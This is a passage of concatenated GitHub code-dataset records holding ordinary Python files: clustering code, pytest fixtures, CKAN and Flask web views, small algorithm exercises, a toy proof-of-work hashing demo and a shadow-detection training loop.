number of clusters: %d\" % n_clusters_)\n print(\"Estimated number of noise points: %d\" % n_noise_)\n print(\"Homogeneity: %0.3f\" % metrics.homogeneity_score(labels_true, labels))\n print(\"Completeness: %0.3f\" % metrics.completeness_score(labels_true, labels))\n print(\"V-measure: %0.3f\" % metrics.v_measure_score(labels_true, labels))\n print(\"Adjusted Rand Index: %0.3f\" % metrics.adjusted_rand_score(labels_true, labels))\n print(\n \"Adjusted Mutual Information: %0.3f\"\n % metrics.adjusted_mutual_info_score(labels_true, labels)\n )\n print(\"Silhouette Coefficient: %0.3f\" % metrics.silhouette_score(X, labels))\n\n if visualize:\n unique_labels = np.unique(labels)\n for ul in unique_labels:\n plt.plot(X[labels==ul,0],X[labels==ul,1],'.')\n\ndef numpyToPoints(X):\n Points = []\n for i in range(len(X)):\n Points.append(Point(X[i], 0))\n return Points\n\nclass DBSCAN:\n def __init__(self, eps, minPts) -> None:\n self.eps = eps\n self.minPts = minPts\n self.distFunc = self.euclideanDist\n self.labels = []\n\n def RangeQuery(self, Points, p):\n inRange = []\n for point in Points:\n if self.distFunc(p, point) < self.eps:\n inRange.append(point)\n return inRange\n\n def euclideanDist(self, p1:Point, p2:Point):\n return np.sqrt(np.sum(np.power(p1.location-p2.location,2)))#np.sqrt((p1.x - p2.x)**2 + (p1.y - p2.y)**2)\n\n def fit(self, Points):\n C = 0\n for i, p in enumerate(Points):\n if p.label != 0:\n continue\n neighbors = self.RangeQuery(Points, p)\n if len(neighbors) < self.minPts:\n p.label = -1\n continue\n C += 1\n p.label = C\n for n in neighbors:\n if n.label == -1:\n n.label = C\n if n.label != 0:\n continue\n n.label = C\n newNeighbors = self.RangeQuery(Points, n)\n if len(newNeighbors) > self.minPts:\n neighbors.extend(newNeighbors)\n for _, p in enumerate(Points):\n self.labels.append(p.label)\n\ndef HDBSCAN(X, threshold):\n xydists = np.array([np.array([x for _ in range(len(X))]) - X for x in X])\n dists = np.sqrt(xydists[:,:,0]**2 + xydists[:,:,1]**2)\n Npoints = len(dists)\n max_dist = np.max(dists)\n dists[np.triu_indices(Npoints)] = max_dist\n\n mindist = [0]\n mindistPts = []\n\n plt.plot(X[:,0],X[:,1],'o')\n\n i = 0\n while mindist[-1] < threshold and i<dists.size:\n minidx = np.argmin(dists)\n row = minidx // Npoints\n col = minidx % Npoints\n mindist.append(dists[row,col])\n mindistPts.append([row, col])\n dists[row,col] = max_dist\n plt.plot(X[row,0],X[row,1],'or')\n plt.plot(X[col,0],X[col,1],'or')\n plt.plot([X[row,0],X[col,0]],[X[row,1],X[col,1]], 'b')\n i += 1\n plt.show()","repo_name":"jsobolew/MED22ZDBSCAN","sub_path":"DBSCAN.py","file_name":"DBSCAN.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19875652802","text":"from unittest.mock import Mock\nimport os\nfrom pathlib import Path\n\nimport pytest\nfrom torchvision.io import write_png\nimport torch\nfrom requests import Response\n\nfrom product_classifier.config import ConfigModel\nfrom product_classifier.dataset.dataset import AmazonDataset\nfrom product_classifier.dataset.product import AmazonProduct, Image\n\n\n@pytest.fixture\ndef generate_amazon_product_strings():\n def _generate_amazon_product_strings(num_products: int):\n product_strings = []\n for idx in range(num_products):\n product_string = f'{{\\'asin\\': \\'asin_{idx}\\', \\'imUrl\\': \\'imUrl_{idx}.png\\', \\'categories\\': [[\\'category_{idx}\\']], \\'title\\': \\'title_{idx}\\'}}'\n product_strings.append(product_string)\n return 
product_strings\n return _generate_amazon_product_strings\n\n\n@pytest.fixture\ndef generate_amazon_dataset(tmp_path, generate_amazon_product_strings):\n def _generate_amazon_dataset(num_products: int):\n products = []\n for product_string in generate_amazon_product_strings(num_products):\n products.append(AmazonProduct.parse_product(product_string))\n dataset = AmazonDataset(str(tmp_path))\n dataset.products = products\n return dataset\n return _generate_amazon_dataset\n\n\n@pytest.fixture\ndef generate_amazon_dataset_file(tmp_path, generate_amazon_product_strings):\n def _generate_amazon_dataset_file(number_of_products: int):\n dataset_dir = tmp_path / \"amazon_dataset\"\n dataset_dir.mkdir()\n file_name = \"test_dataset.json\"\n file_path = dataset_dir / file_name\n product_strings = generate_amazon_product_strings(number_of_products)\n file_path.write_text('\\n'.join(product_strings))\n\n return dataset_dir, file_name\n return _generate_amazon_dataset_file\n\n\n@pytest.fixture\ndef mock_image_response():\n mock_response = Response()\n mock_response.status_code = 200\n mock_response._content = b'a test image encoded as bytes'\n mock_response.headers = {'Content-Type': 'image/png'}\n return mock_response\n\n\n@pytest.fixture\ndef mock_requests_get(mock_image_response, monkeypatch):\n mock_requests_get = Mock(return_value=mock_image_response)\n monkeypatch.setattr('product_classifier.dataset.dataset.requests.get', mock_requests_get)\n return mock_requests_get\n\n\n@pytest.fixture()\ndef example_product():\n product_dict = {\n 'asin': 'asin_0',\n 'title': 'title_0',\n 'image': Image(url='imUrl_0.png', filepath='imUrl_0.png'),\n 'categories': [['category_0']]\n }\n product = AmazonProduct(**product_dict)\n return product\n\n\n@pytest.fixture()\ndef example_dataset_dir(tmp_path) -> Path:\n dataset_dir = tmp_path / \"amazon_dataset\"\n dataset_dir.mkdir()\n return dataset_dir\n\n\n@pytest.fixture()\ndef example_product_image_path(example_dataset_dir, example_product) -> Path:\n images_dir = example_dataset_dir / \"images\"\n images_dir.mkdir()\n file_name = example_product.id + '.png'\n image_path = images_dir / file_name\n return image_path\n\n\ndef test_len_returns_number_of_products():\n num_products = 4\n products = [\n AmazonProduct(\n asin='',\n title='',\n image=Image(url='', filepath=''),\n categories=[['Movies & TV', 'Movies', 'Horror']]\n )\n for i in range(num_products)\n ]\n\n amazon_dataset = AmazonDataset(dataset_dir='')\n amazon_dataset.products = products\n\n assert len(amazon_dataset) == num_products\n\n\ndef test_getitem(example_product, example_dataset_dir, example_product_image_path):\n start_image = torch.zeros(3, 400, 600, dtype=torch.uint8)\n write_png(start_image, str(example_product_image_path))\n an_amazon_dataset = AmazonDataset(str(example_dataset_dir))\n\n random_vector = torch.rand(ConfigModel.word_embedding_vector_length)\n embeddings_dict = {'title_0': random_vector}\n an_amazon_dataset.set_word_embedding(embeddings_dict)\n\n example_product.image = Image(url='', file_path=str(example_product_image_path))\n an_amazon_dataset.products = [example_product]\n an_amazon_dataset.set_category_to_idx()\n\n (image, title_vector), category = an_amazon_dataset[0]\n\n assert isinstance(image, torch.Tensor)\n assert isinstance(title_vector, torch.Tensor)\n assert torch.equal(title_vector, random_vector)\n assert category == an_amazon_dataset.category_to_idx[example_product.category]\n\n\ndef test_load_reads_file_and_can_parse_a_product(generate_amazon_dataset_file):\n 
number_of_products = 1\n dataset_dir, file_name = generate_amazon_dataset_file(number_of_products)\n amazon_dataset = AmazonDataset(str(dataset_dir))\n\n amazon_dataset.load(file_name=file_name, max_products=number_of_products)\n\n assert len(amazon_dataset.products) == number_of_products\n assert amazon_dataset.products[0].dict() == {\n 'id': 'asin_0',\n 'title': 'title_0',\n 'image': {\n 'url': 'imUrl_0.png',\n 'file_path': None\n },\n 'category': 'category_0',\n }\n\n\ndef test_load_parses_specified_number_of_products(generate_amazon_dataset_file):\n number_of_products_in_file = 12\n max_number_of_products_to_load = 10\n dataset_dir, file_name = generate_amazon_dataset_file(number_of_products_in_file)\n amazon_dataset = AmazonDataset(str(dataset_dir))\n\n amazon_dataset.load(file_name=file_name, max_products=max_number_of_products_to_load)\n\n assert len(amazon_dataset.products) == max_number_of_products_to_load\n\n\ndef test_load_parses_all_products_in_file_if_max_products_greater(generate_amazon_dataset_file):\n \"\"\"In case where number_of_products_in_file < max_number_of_products, we want to load all\n products in the file.\"\"\"\n number_of_products_in_file = 6\n max_number_of_products_to_load = 10\n dataset_dir, file_name = generate_amazon_dataset_file(number_of_products_in_file)\n amazon_dataset = AmazonDataset(str(dataset_dir))\n\n amazon_dataset.load(file_name=file_name, max_products=max_number_of_products_to_load)\n\n assert len(amazon_dataset.products) == number_of_products_in_file\n\n\ndef test_download_product_images_downloads_image_and_saves(mock_requests_get, example_product, example_dataset_dir,\n example_product_image_path):\n an_amazon_dataset = AmazonDataset(str(example_dataset_dir))\n an_amazon_dataset.products = [example_product]\n\n an_amazon_dataset.download_product_images()\n\n assert os.path.exists(example_product_image_path)\n mock_requests_get.assert_called_with(url=example_product.image.url, allow_redirects=True)\n\n\ndef test_download_product_images_skips_download_if_file_exists_already(mock_requests_get, example_product,\n example_dataset_dir, example_product_image_path,\n tmp_path):\n expected_file_content = 'a png image to not be overwritten'\n example_product_image_path.write_text(expected_file_content)\n an_amazon_dataset = AmazonDataset(str(example_dataset_dir))\n an_amazon_dataset.products = [example_product]\n\n an_amazon_dataset.download_product_images()\n\n assert example_product_image_path.read_text() == expected_file_content\n\n\ndef test_download_product_images_redownloads_image_if_forced(mock_requests_get, mock_image_response, example_product,\n example_dataset_dir, example_product_image_path, tmp_path):\n original_file_content = 'original file content'\n example_product_image_path.write_text(original_file_content)\n an_amazon_dataset = AmazonDataset(str(example_dataset_dir))\n an_amazon_dataset.products = [example_product]\n\n an_amazon_dataset.download_product_images(force_download=True)\n\n assert example_product_image_path.read_text() != original_file_content\n assert example_product_image_path.read_text() == mock_image_response.text\n\n\ndef test_set_class_name_to_idx(generate_amazon_dataset):\n num_products = 3\n dataset = generate_amazon_dataset(num_products)\n\n dataset.set_category_to_idx()\n\n assert dataset.category_to_idx == {\n 'category_0': 0,\n 'category_1': 1,\n 'category_2': 2\n 
}\n","repo_name":"SBcharles/Product-Classifier","sub_path":"tests/test_product_classifier/test_dataset/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73642538408","text":"# encoding: utf-8\nimport logging\n\nfrom flask import Blueprint\nfrom flask.views import MethodView\nfrom ckan.common import asbool\n\nimport ckan.lib.authenticator as authenticator\nimport ckan.lib.base as base\nimport ckan.lib.helpers as h\nimport ckan.lib.navl.dictization_functions as dictization_functions\nimport ckan.logic as logic\nimport ckan.logic.schema as schema\nimport ckan.model as model\nfrom ckan import authz\nfrom ckan.common import _, config, g, request\n\nlog = logging.getLogger(__name__)\n\n# hooks for subclasses\nedit_user_form = u'user/edit_user_form.html'\n\nuser = Blueprint(u'user_edit', __name__, url_prefix=u'/user_edit')\n\n\ndef set_repoze_user(user_id, resp):\n u'''Set the repoze.who cookie to match a given user_id'''\n if u'repoze.who.plugins' in request.environ:\n rememberer = request.environ[u'repoze.who.plugins'][u'friendlyform']\n identity = {u'repoze.who.userid': user_id}\n resp.headers.extend(rememberer.remember(request.environ, identity))\n\n\ndef _edit_form_to_db_schema():\n return schema.user_edit_form_schema()\n\n\ndef _extra_template_variables(context, data_dict):\n is_sysadmin = authz.is_sysadmin(g.user)\n try:\n user_dict = logic.get_action(u'user_show')(context, data_dict)\n except logic.NotFound:\n base.abort(404, _(u'User not found'))\n except logic.NotAuthorized:\n base.abort(403, _(u'Not authorized to see this page'))\n\n is_myself = user_dict[u'name'] == g.user\n about_formatted = h.render_markdown(user_dict[u'about'])\n extra = {\n u'is_sysadmin': is_sysadmin,\n u'user_dict': user_dict,\n u'is_myself': is_myself,\n u'about_formatted': about_formatted\n }\n return extra\n\n\nclass EditView(MethodView):\n def _prepare(self, id):\n context = {\n u'save': u'save' in request.form,\n u'schema': _edit_form_to_db_schema(),\n u'model': model,\n u'session': model.Session,\n u'user': g.user,\n u'auth_user_obj': g.userobj\n }\n if id is None:\n if g.userobj:\n id = g.userobj.id\n else:\n base.abort(400, _(u'No user specified'))\n data_dict = {u'id': id}\n\n try:\n logic.check_access(u'user_update', context, data_dict)\n except logic.NotAuthorized:\n base.abort(403, _(u'Unauthorized to edit a user.'))\n return context, id\n\n def post(self, id=None):\n context, id = self._prepare(id)\n if not context[u'save']:\n return self.get(id)\n\n if id in (g.userobj.id, g.userobj.name):\n current_user = True\n else:\n current_user = False\n old_username = g.userobj.name\n\n try:\n data_dict = logic.clean_dict(\n dictization_functions.unflatten(\n logic.tuplize_dict(logic.parse_params(request.form))))\n data_dict.update(logic.clean_dict(\n dictization_functions.unflatten(\n logic.tuplize_dict(logic.parse_params(request.files))))\n )\n\n except dictization_functions.DataError:\n base.abort(400, _(u'Integrity Error'))\n data_dict.setdefault(u'activity_streams_email_notifications', False)\n\n context[u'message'] = data_dict.get(u'log_message', u'')\n data_dict[u'id'] = id\n\n try:\n user = logic.get_action(u'user_update')(context, data_dict)\n except logic.NotAuthorized:\n base.abort(403, _(u'Unauthorized to edit user %s') % id)\n except logic.NotFound:\n base.abort(404, _(u'User not found'))\n except logic.ValidationError as e:\n errors = 
e.error_dict\n error_summary = e.error_summary\n return self.get(id, data_dict, errors, error_summary)\n\n h.flash_success(_(u'Profile updated'))\n resp = h.redirect_to(u'user.read', id=user[u'name'])\n if current_user and data_dict[u'name'] != old_username:\n # Changing currently logged in user's name.\n # Update repoze.who cookie to match\n set_repoze_user(data_dict[u'name'], resp)\n return resp\n\n def get(self, id=None, data=None, errors=None, error_summary=None):\n context, id = self._prepare(id)\n data_dict = {u'id': id}\n try:\n old_data = logic.get_action(u'user_show')(context, data_dict)\n\n g.display_name = old_data.get(u'display_name')\n g.user_name = old_data.get(u'name')\n\n data = data or old_data\n\n except logic.NotAuthorized:\n base.abort(403, _(u'Unauthorized to edit user %s') % u'')\n except logic.NotFound:\n base.abort(404, _(u'User not found'))\n user_obj = context.get(u'user_obj')\n\n errors = errors or {}\n vars = {\n u'data': data,\n u'errors': errors,\n u'error_summary': error_summary\n }\n\n extra_vars = _extra_template_variables({\n u'model': model,\n u'session': model.Session,\n u'user': g.user\n }, data_dict)\n\n extra_vars[u'show_email_notifications'] = asbool(\n config.get(u'ckan.activity_streams_email_notifications'))\n vars.update(extra_vars)\n extra_vars[u'form'] = base.render(edit_user_form, extra_vars=vars)\n\n return base.render(u'user/edit.html', extra_vars)\n\n\n_edit_view = EditView.as_view(str(u'edit'))\nuser.add_url_rule(u'/', view_func=_edit_view)\nuser.add_url_rule(u'/<id>', view_func=_edit_view)\n","repo_name":"ALTERNATIVE-EU/ckanext-keycloak_auth","sub_path":"ckanext/keycloak_auth/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73030138409","text":"def solution(n, t, m, timetable):\n timetable = sorted(timetable, reverse=True)\n timetable = [int(time[:2]) * 60 + int(time[3:]) for time in timetable]\n\n for i in range(n):\n arriveTime = 540 + i * t\n cnt = 0\n\n while timetable:\n if timetable[-1] > arriveTime or cnt >= m:\n break\n\n lastTime = timetable[-1]\n timetable.pop()\n cnt += 1\n\n if not timetable:\n if cnt < m:\n answer = arriveTime\n else:\n answer = lastTime - 1\n return '%02d:%02d' % (answer // 60, answer % 60)\n\n if i == n - 1:\n if cnt < m:\n answer = arriveTime\n else:\n answer = lastTime - 1\n return '%02d:%02d' % (answer // 60, answer % 60)\n","repo_name":"CHOSIYEON/Algorithms","sub_path":"KAKAO/Level 3/[1차] 셔틀버스.py","file_name":"[1차] 셔틀버스.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11643730838","text":"'''\n给你一个链表的头节点 head 和一个特定值 x ,请你对链表进行分隔,使得所有 小于 x 的节点都出现在 大于或等于 x 的节点之前。\n\n你应当 保留 两个分区中每个节点的初始相对位置。\n\n示例 1:\n输入:head = [1,4,3,2,5,2], x = 3\n输出:[1,2,2,4,3,5]\n\n示例 2:\n输入:head = [2,1], x = 2\n输出:[1,2]\n\n'''\n\nfrom Def import LinkedList\n\nclass Solution:\n def partition(self, head, x):\n large = LinkedList.Node(0, None)\n little = LinkedList.Node(0, head)\n\n currli = little\n currla = large\n while currli.next:\n if currli.next.val >= x:\n currla.next = currli.next\n \n currli.next = currli.next.next\n\n currla = currla.next\n currla.next = None\n\n else:\n currli = currli.next\n currli.next = large.next\n return little.next\n\n \nL1 = [1,4,3,2,5,2]\nL1 = LinkedList.list_to_Linked(L1)\n\nS = Solution() \nre = LinkedList.linked_to_list(S.partition(L1, 3))\nprint(re) 
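# For reference, the same stable two-partition idea on a plain Python list --
# a self-contained sketch that does not depend on the Def.LinkedList helper
# (partition_values is an illustrative name, not part of the original module):
def partition_values(values, x):
    little = [v for v in values if v < x]
    large = [v for v in values if v >= x]
    return little + large

assert partition_values([1, 4, 3, 2, 5, 2], 3) == [1, 2, 2, 4, 3, 5]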
\n","repo_name":"He1o/NootBook_LeetCode","sub_path":"old/Def/86.分隔链表.py","file_name":"86.分隔链表.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27625948884","text":"import os\nimport torch\nfrom torchvision import transforms\nfrom torch.utils.tensorboard import SummaryWriter\nfrom os.path import join as pjoin\nimport argparse\n\nfrom torch.backends import cudnn\n\ncudnn.benchmark = True\nfrom PIL import ImageFile\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\nfrom model.network import Network, Weighted_BCE_Loss\nfrom data.data_augmentation import data_augmentation\nfrom utils import initialize_project, build_dataloader, AvgMeter, check_refine, save_mask, get_model_args\n\nhistory_BER = None\nhistory_epoch = None\n\n\ndef main(args):\n global history_BER, history_epoch # to record the best ckpt in training\n args_train = args['training_config']\n\n project_dir = pjoin(args['project_config']['save_project_dir'], args['project_config']['project_name'])\n\n refined_img_path = pjoin(project_dir, 'refined_data_%s' % args_train['dataset'])\n refinement_visualization_path = pjoin(project_dir, 'refinement_visualize')\n dataset_path = args['data_dir'][args_train['dataset']]\n save_ckpt_path = pjoin(project_dir, 'weights')\n\n # prepare data, directories and visualizations\n initialize_project(refined_img_path, refinement_visualization_path, save_ckpt_path, dataset_path, args)\n\n net = Network(\n input_resolution=args_train['data']['resolution'],\n backbone=args_train['backbone'],\n backbone_ckpt=args['pretrained_encoder_dir'][args_train['backbone']]\n ).cuda()\n\n tensorboard_path = pjoin(project_dir, 'tensorboard')\n writer = SummaryWriter(tensorboard_path)\n\n for T in range(args_train['round']):\n\n train_loader, test_loader, refine_loader = build_dataloader(refined_img_path, dataset_path, args)\n loss_fn = Weighted_BCE_Loss(mu=0.7, eps=1e-5)\n optimizer = torch.optim.Adamax(filter(lambda p: p.requires_grad, net.parameters()), args_train['train']['lr'])\n\n history_BER = 9999\n history_epoch = 0\n\n train(net, optimizer, loss_fn, writer, train_loader, test_loader, T + 1, project_dir, args)\n\n if T != args_train['round'] - 1:\n refine(net, refine_loader, T + 1, refinement_visualization_path, args)\n\n writer.close()\n\n\ndef train(net, optimizer, loss_fn, writer, train_loader, test_loader, round, project_path, args):\n net.train()\n train_net_loss_record = AvgMeter()\n total_iter = 0\n args_train = args['training_config']\n\n for epoch in range(args_train['train']['total_epoch']):\n print('total parameters: %d' % (sum(p.numel() for p in net.parameters())))\n\n for data in train_loader:\n total_iter += 1\n\n inputs, gts = data\n if args_train['data']['data_augmentation']:\n inputs, gts = data_augmentation(inputs, gts, args_train['data']['layers'],\n args_train['data']['augmentation_magnitude'])\n inputs = inputs.cuda()\n gts = gts.cuda()\n\n optimizer.zero_grad()\n result = net(inputs)\n loss_net = loss_fn(result, gts)\n loss_net.backward()\n optimizer.step()\n\n writer.add_scalar('Loss', loss_net, total_iter)\n train_net_loss_record.update(loss_net.data, inputs.size(0))\n\n log = '[round %d] [epoch %d] [iter %d] [train loss %.5f] [curr_optimal %.4f]' % \\\n (round, epoch + 1, total_iter, train_net_loss_record.avg, history_BER)\n print(log)\n\n if (total_iter + 1) % args_train['train']['save_mask_freq'] == 0:\n with torch.no_grad():\n save_mask(inputs.cpu(), result.cpu(), gts.cpu(), total_iter, 
project_path,\n args_train['data']['resolution'])\n\n validate(net, epoch + 1, test_loader, round, writer, args)\n\n\ndef validate(net, epoch, test_loader, round, writer, args):\n print('validating...')\n net.eval()\n\n total_Tp = 0\n total_Tn = 0\n total_P = 0\n total_N = 0\n\n global history_BER, history_epoch\n\n with torch.no_grad():\n for i, data in enumerate(test_loader):\n inputs, gts = data\n inputs = inputs.cuda()\n gts = gts.cuda()\n\n res = net(inputs)\n\n gts_map = gts > 0.5\n res_map = res > 0.5\n\n total_P += torch.sum(gts_map == True).item()\n total_N += torch.sum((gts_map == False)).item()\n total_Tp += torch.sum((gts_map == True) & (res_map == True)).item()\n total_Tn += torch.sum((gts_map == False) & (res_map == False)).item()\n\n print('validating: %d/%d' % (i + 1, len(test_loader)))\n\n BER = 0.5 * (2 - total_Tp / total_P - total_Tn / total_N) * 100\n writer.add_scalar('BER on validation, round %d' % (round), BER, epoch + 1)\n\n if (BER < history_BER):\n save_ckpt_path = pjoin(args['project_config']['save_project_dir'], args['project_config']['project_name'],\n 'weights')\n\n # remove previous ckpt\n old_weight_path = pjoin(save_ckpt_path, '%.4f_round%d_epoch%d.pth' % (history_BER, round, history_epoch))\n if os.path.exists(old_weight_path):\n os.system('rm %s' % old_weight_path)\n\n history_BER = BER\n history_epoch = epoch\n new_weight_path = pjoin(save_ckpt_path, '%.4f_round%d_epoch%d.pth' % (history_BER, round, history_epoch))\n checkpoint = {\n 'state_dict': net.state_dict(),\n 'configs': args\n }\n torch.save(checkpoint, new_weight_path)\n\n net.train()\n\n\ndef refine(net, refine_loader, round, refinement_visualization_path, args):\n print('refining...')\n\n # load the best ckpt\n params_path = pjoin(args['project_config']['save_project_dir'], args['project_config']['project_name'], 'weights',\n '%.4f_round%d_epoch%d.pth' % (history_BER, round, history_epoch))\n net.load_state_dict(torch.load(params_path, map_location=lambda storage, loc: storage.cuda(0))['state_dict'])\n\n net.eval()\n\n args_refine = args['training_config']['refine']\n with (torch.no_grad()):\n for idx, data in enumerate(refine_loader):\n if idx == len(refine_loader) - 1: # this is a problem with the dataloader\n break\n\n img, gts, gts_path, size = data\n img_var = img.cuda()\n\n if args_refine['crop']:\n crop_num = args_refine['crop_size'] * args_refine['crop_size']\n img_sep = torch.zeros(\n (crop_num + 1, 3, args_refine['refine_resolution'], args_refine['refine_resolution'])).cuda()\n\n img_sep[-1] = img_var.squeeze(0).clone()\n\n length = args_refine['refine_resolution'] // args_refine['crop_size']\n for i in range(args_refine['crop_size']):\n for j in range(args_refine['crop_size']):\n img_sep[i * args_refine['crop_size'] + j] = transforms.Resize(args_refine['refine_resolution'])(\n img_var[:, :, \\\n i * length:(i + 1) * length, j * length:(j + 1) * length].squeeze(0))\n\n res_ini = net(img_sep)\n res_global = res_ini[-1].unsqueeze(0).clone()\n\n res_ini = transforms.Resize(length)(res_ini)\n\n res_local = torch.zeros(\n (1, 1, args_refine['refine_resolution'], args_refine['refine_resolution'])).cuda()\n for i in range(args_refine['crop_size']):\n for j in range(args_refine['crop_size']):\n res_local[:, :, i * length:(i + 1) * length, j * length:(j + 1) * length] = \\\n res_ini[i * args_refine['crop_size'] + j:i * args_refine['crop_size'] + j + 1]\n\n res_local = res_local * (res_global > args_refine['filter_threshold'])\n res = torch.maximum(res_global, res_local)\n\n else:\n res = 
net(img_var)\n res_global = res\n res_local = res\n\n gts_refined, is_refined = check_refine( # check whether to accept the refined mask\n img.squeeze(0).cuda(), res.squeeze(0), gts.squeeze(0).cuda(),\n idx + 1, res_global.squeeze(0), res_local.squeeze(0),\n args_refine,\n refinement_visualization_path)\n gts_refined = transforms.Resize(size)(transforms.ToPILImage()(gts_refined))\n if is_refined:\n gts_refined.save(gts_path[0])\n\n print('refining: %d/%d' % (idx + 1, len(refine_loader)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-c',\n \"--config\",\n type=str,\n required=False,\n default='configs/silt_training_config.yaml',\n help=\"The yaml file for the model's configuration\",\n )\n\n parser.add_argument(\n '-s',\n \"--save_project_dir\",\n type=str,\n required=False,\n default='ckpt',\n help=\"path to save the project results\",\n )\n\n parser.add_argument(\n '-n',\n \"--project_name\",\n type=str,\n required=False,\n default=None,\n help=\"name of the project\",\n )\n\n parser.add_argument(\n '-d',\n \"--dataset\",\n type=str,\n required=False,\n default='SBU',\n help=\"training dataset\",\n choices=['SBU', 'UCF', 'ISTD']\n )\n\n parser.add_argument(\n '-b',\n \"--backbone\",\n type=str,\n required=False,\n default='PVT-b5',\n help=\"network backbone name\",\n choices=['ResNeXt', 'efficientnet-b3', 'efficientnet-b7', 'efficientnet-b8',\n 'convnext-small', 'convnext-base', 'PVT-b3', 'PVT-b5']\n )\n\n args_from_parser = parser.parse_args()\n args = get_model_args(args_from_parser)\n\n main(args)\n","repo_name":"Cralence/SILT","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"74163189929","text":"from hashlib import sha256\n\nMAX_NONCE = 10000000000\n\n# SHA256 is an algorithm for \ndef SHA256(text):\n return sha256(text.encode(\"ascii\")).hexdigest()\n\ndef mine(block_number, transactions, previous_hash, prefix_zeros):\n prefix_str = '0'*prefix_zeros\n for nonce in range(MAX_NONCE):\n text = str(block_number) + transactions + previous_hash + str(nonce)\n new_hash = SHA256(text)\n if new_hash.startswith(prefix_str):\n print(f\"Cool! Succesfully mined bictoins with nonce value: {nonce}\")\n return new_hash\n \n raise BaseException(f\"Sorry! Could not find it after trying {MAX_NONCE} times\")\n\n# Main block\nif __name__ == \"__main__\":\n transactions = '''\n Baldur->John->20\n Lara->Freya->45\n '''\n # Try to change this to higher number, and you see it will take more time for mining as difficulty level increases\n difficulty = 5\n import time\n start = time.time()\n print('Start mining ... 
⛏️ ')\n \n new_hash = mine(6, transactions, \n 'aded354032d0a8e9d9c51995ed73b5a056d5ffe6', difficulty)\n time_spent_on_mining = str((time.time() - start))\n print(f\"Mining Terminated ⚒️ in {time_spent_on_mining} seconds.\")\n print(new_hash)\n \n ","repo_name":"BekBrace/four-projects-python","sub_path":"4bitcoin.py","file_name":"4bitcoin.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34397133540","text":"# ----------------------------------------------------------------------------#\n# Imports\n# ----------------------------------------------------------------------------#\nimport logging\nimport os\nimport sys\nfrom logging import FileHandler, Formatter\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom formss import *\nfrom flask_wtf import Form\nfrom model import Artist, Venue, Show, db\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nimport dateutil.parser\nimport babel\n\n# ----------------------------------------------------------------------------#\n# App Config.\n# ----------------------------------------------------------------------------#\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb.init_app(app)\nmigrate = Migrate(app, db)\nSQLALCHEMY_DATABASE_URI = 'postgres://Ammar@localhost:5432/fyyur'\n\n\n# Filters.\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format = \"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format = \"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format, locale='en')\n\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n\n# ----------------------------------------------------------------------------#\n# Controllers.\n# ----------------------------------------------------------------------------#\n\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n venues = Venue.query.order_by(Venue.state, Venue.city).all()\n data = []\n for v in venues:\n regions = Venue.query.filter_by(state=v.state).filter_by(city=v.city).all()\n datum = []\n for venue in regions:\n datum.append({\n \"id\": venue.id,\n \"name\": venue.name,\n \"num_upcoming_shows\": len(list(filter(lambda x: x.start_time > datetime.today(),\n venue.shows)))\n })\n data.append({\n \"city\": v.city,\n \"state\": v.state,\n \"venues\": datum\n })\n\n return render_template('pages/venues.html', areas=data)\n\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n search_term = request.form.get('search_term')\n venue = Venue.query.filter(\n Venue.name.ilike(\"%{}%\".format(search_term))).all()\n count_venues = len(venue)\n datum = [v.to_dict() for v in venue]\n response = {\n \"count\": count_venues,\n \"data\": datum\n }\n return render_template('pages/search_venues.html', results=response,\n search_term=request.form.get('search_term', None))\n\n\n@app.route('/venues/<int:venue_id>')\ndef show_venue(venue_id):\n venues = Venue.query.get(venue_id)\n data = 
venues.todict_shows()\n return render_template('pages/show_venue.html', venue=data)\n\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n error = False\n try:\n venue = Venue()\n venue.name = request.form['name']\n venue.city = request.form['city']\n venue.state = request.form['state']\n venue.address = request.form['address']\n venue.phone = request.form['phone']\n genre = request.form.getlist('genres')\n venue.genres = ','.join(genre)\n venue.facebook_link = request.form['facebook_link']\n db.session.add(venue)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n\n db.session.close()\n if error:\n flash('An error occured. Venue ' +\n request.form['name'])\n else:\n flash('Venue ' + request.form['name'] +\n ' was successfully added!')\n return render_template('pages/home.html')\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n artists = 